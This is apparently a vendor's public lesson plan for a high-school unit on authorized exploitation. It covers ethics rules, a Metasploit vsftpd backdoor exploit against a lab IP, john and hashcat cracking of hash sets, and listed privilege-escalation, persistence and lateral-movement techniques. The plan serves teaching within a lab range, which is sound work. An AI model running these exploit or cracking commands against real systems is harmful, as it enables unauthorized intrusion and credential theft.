Blackbox Intelligence Group
Sign in
← All modules

Cybersecurity II · Module 6

Cybersecurity II, Unit 6: Ethical Exploitation Concepts

Where the ethics meet the keyboard. Authorized exploitation in the lab range only: Metasploit basics, password attacks against teacher-issued hash sets, post-exploitation concepts, and the discipline of stopping at proof-of-concept.

Length
360 min
Level
advanced
Track
Cyber II
Cadence
Semester 2

Career paths

Penetration TesterNetwork DefenderFoundations
Unlock this module →Request a review copyTry the free pack

Download 1-page brochure (PDF)·Share with admins, parents, or your CTE director.

What's in the lesson pack

Everything you need to teach this period.

Built by an OSCP-certified instructor who teaches this material every week. Print-ready, classroom-tested, copy-paste-able.

Teacher Guide

Locked

Lesson at a glance, learning objectives, vocabulary, pacing, mini-lessons, and discussion notes.

In-browser presenter

Locked

Full themed slide deck you can run live from your laptop. Speaker notes built in. Works offline once loaded.

PowerPoint (.pptx) export

Locked

Editable slide deck for districts that mandate PowerPoint or want to customize for their LMS.

Module overview

The full lesson plan, public.

Read everything before you commit. The plan, objectives, vocabulary, standards alignment, and pacing are open. Only the print-ready deliverables are gated.

Unit 6: Ethical Exploitation Concepts

Lesson at a glance

| Item | Detail | | --------------------- | -------------------------------------------------------------------------------------------- | | Suggested length | 6 × 60 minutes | | Recommended placement | Weeks 8–9 of Cyber II | | Prerequisite | Units 1–5; signed advanced RoE on file | | Materials | Kali, Metasploitable2, john/hashcat, teacher-issued hash sets, screen recorder for write-ups |

Safety: This unit's labs run only in the host-only lab range, only against teacher-prepared targets, only under signed RoE.

Forbidden anywhere on or off school property: running these tools or techniques against any system you do not own and do not have written authorization to test. Doing so violates the CFAA, the Va. Computer Crimes Act, and ends your career before it starts.

Teacher reads this aloud at the start of every class in this unit.

Standards & credential alignment

  • OffSec PEN-100 + intro PWK concepts.
  • EHE: ethical hacking framework, system hacking concepts.
  • VA CTE Advanced Cyber: penetration testing fundamentals.

Learning objectives

By the end of this unit, students can:

  1. Articulate the legal and ethical framework around exploitation.
  2. Use Metasploit to execute a known exploit against an authorized lab target.
  3. Stop at proof-of-concept; document evidence; never escalate beyond scope.
  4. Crack a teacher-issued hash set with john / hashcat and explain what the result means.
  5. Recognize post-exploitation phases (privilege escalation, persistence, lateral movement) at a conceptual + demo level.
  6. Produce a clean, factual write-up of one authorized exploitation chain.

Vocabulary

  • Exploit - Code or technique that takes advantage of a vulnerability.
  • Payload - Code that runs after exploit succeeds.
  • Shell - Command-line access on the target.
  • Reverse shell vs. bind shell - Target connects out vs. attacker connects in.
  • Post-exploitation - Activity after initial foothold (privesc, persistence, pivoting).
  • Proof-of-concept (PoC) - Minimum demonstration the vulnerability is real.
  • Hash - Fingerprint of a password (MD5, SHA-1, NTLM, bcrypt, etc.).
  • Salt - Random data added to a password before hashing.

Pacing

| Day | Focus | Deliverable | | --- | --------------------------------- | --------------------------------------------- | | 1 | Ethics + the line + RoE | Signed acknowledgement of unit-specific rules | | 2 | Metasploit basics + first exploit | Screenshot of authorized PoC | | 3 | Password hashing + cracking | john output on teacher hash set | | 4 | Post-exploit concepts (demo only) | Notes on privesc + persistence + lateral | | 5 | Putting it together | One full authorized chain with screenshots | | 6 | Write-up | Findings document, 4–8 pages |

Day 1 - Ethics, the line, the rules

Read aloud. Discuss. Sign.

Unit 6 Operating Rules:

  1. I will only run exploitation tools against the targets the teacher has provided in the lab range.
  2. I will not run these tools on home networks, friends' devices, school production systems, or any system not in this lab.
  3. I will stop at proof-of-concept. I will not pivot, exfiltrate real data, or expand scope.
  4. I will document every action with timestamps and screenshots.
  5. If anything unexpected happens, I will stop, snapshot, and call the teacher.
  6. I understand that violating these rules is a federal crime under the CFAA and a state crime under Va. Code § 18.2-152.3.

Day 2 - Metasploit first exploit

sudo msfdb init
msfconsole

# Identify target service from Unit 5 scan
search type:exploit name:vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.56.20
run

When the shell lands, students:

  1. Run whoami.
  2. Run hostname.
  3. Take a screenshot.
  4. Type exit and stop.

That is the proof of concept. That is the engagement.

Day 3 - Password hashing + cracking

Teacher issues a hash file lab-hashes.txt containing 10 hashes (mix of MD5, SHA-256, NTLM) generated from a known wordlist plus a few weak passwords.

# Identify hash type
hashid 5f4dcc3b5aa765d61d8327deb882cf99

# Crack with john
john --wordlist=/usr/share/wordlists/rockyou.txt lab-hashes.txt
john --show lab-hashes.txt

# Crack with hashcat (GPU if available)
hashcat -m 0 -a 0 lab-hashes.txt /usr/share/wordlists/rockyou.txt

Discuss results:

  • Why did MD5 fall in seconds and bcrypt take hours?
  • What does this tell us about password storage choices made by the developer?
  • What's the defensive lesson? (Strong hashing + salt + length + MFA.)

Day 4 - Post-exploitation (concept + demo)

Three categories:

Privilege escalation (privesc):

  • Linux: SUID binaries, sudoers misconfigs, kernel exploits.
  • Windows: unquoted service paths, weak service ACLs, AlwaysInstallElevated.

Persistence:

  • Linux: cron, systemd unit, .bashrc, SSH authorized_keys.
  • Windows: Run keys, scheduled tasks, services.

Lateral movement:

  • Stolen credentials, pass-the-hash, RDP/SSH hops.

Teacher demonstrates one example per category. Students record into engagement notes. No student-driven post-exploitation in this unit - that's PEN-200 territory.

Day 5 - Full chain (authorized)

In teams (operator + recorder), students perform the complete authorized chain on Metasploitable2:

  1. Confirm target authorized (RoE).
  2. Recon + scan (recap from Units 4–5).
  3. Identify a known vulnerable service.
  4. Exploit to PoC shell.
  5. Capture proof (whoami, hostname, screenshot).
  6. Exit.
  7. Snapshot and step away.

Day 6 - Write-up

Template:

# Authorized Exploitation Findings - Lab Target 192.168.56.20
## Executive Summary
## Scope + Authorization (RoE attached)
## Methodology
  - Recon, scan, exploit, PoC, exit
## Finding 1
  - Title
  - CVSS v3.1
  - Description
  - Evidence (with timestamps)
  - Reproduction steps
  - Impact
  - Recommended remediation
  - References
## Conclusion + Defensive recommendations
## Appendix: tool output, engagement notes

Common misconceptions

  • "If I get a shell, I should explore." - In a real engagement, shell = stop, document, get authorization for next phase.
  • "Cracking a friend's password is a prank." - It is a federal crime. Same statute as cracking a Fortune 500's.
  • "Metasploit is hacking." - Metasploit is a framework. Hacking is methodology, documentation, ethics, and judgment. The framework is just one tool in the kit.

Assessment

  • Day 1 signed acknowledgement on file.
  • Day 2 + 5 PoC screenshots.
  • Day 3 john output + reflection paragraph.
  • Day 6 write-up - rubric scored, weight equivalent to a unit test.

Career connection

Junior pen testers: $70K–$110K. Senior offensive security engineers $130K–$200K. Bug bounty professionals: open-ended. The career exists because authorized exploitation is a service that companies pay for.

Homework

Read OffSec's PWK syllabus excerpt provided. Identify three topics from PEN-200 you'd want to study next.

Ready to use this in class?

Unlock the full Cybersecurity II edition.

All teacher guides, worksheets, scenarios, quizzes, answer keys, and the in-browser presenter for every module in the track. Site-license pricing for schools and districts. Free review copies for verified educators.

View pricingRequest review copySee full curriculum